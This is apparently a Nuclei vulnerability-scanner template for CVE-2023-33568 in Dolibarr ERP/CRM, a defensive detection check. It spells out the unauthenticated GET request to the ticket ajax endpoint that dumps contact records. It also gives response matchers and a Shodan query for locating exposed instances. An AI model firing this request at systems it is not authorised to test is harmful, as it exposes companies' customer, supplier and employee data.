nuclei-templates/http/cves/2023/CVE-2023-33568.yaml

50 lines
1.6 KiB
YAML

id: CVE-2023-33568
info:
name: Dolibarr Unauthenticated Contacts Database Theft
author: DhiyaneshDK
severity: high
description: |
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
remediation: |
Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability.
reference:
- https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
- https://nvd.nist.gov/vuln/detail/CVE-2023-33568
- https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7
- https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e
- https://www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-33568
cwe-id: CWE-552
epss-score: 0.35763
epss-percentile: 0.96649
cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: dolibarr
product: dolibarr_erp\/crm
shodan-query: http.favicon.hash:440258421
tags: cve,cve2023,dolibarr,unauth
http:
- method: GET
path:
- "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"database_name":'
- '"database_user":'
condition: and
- type: status
status:
- 200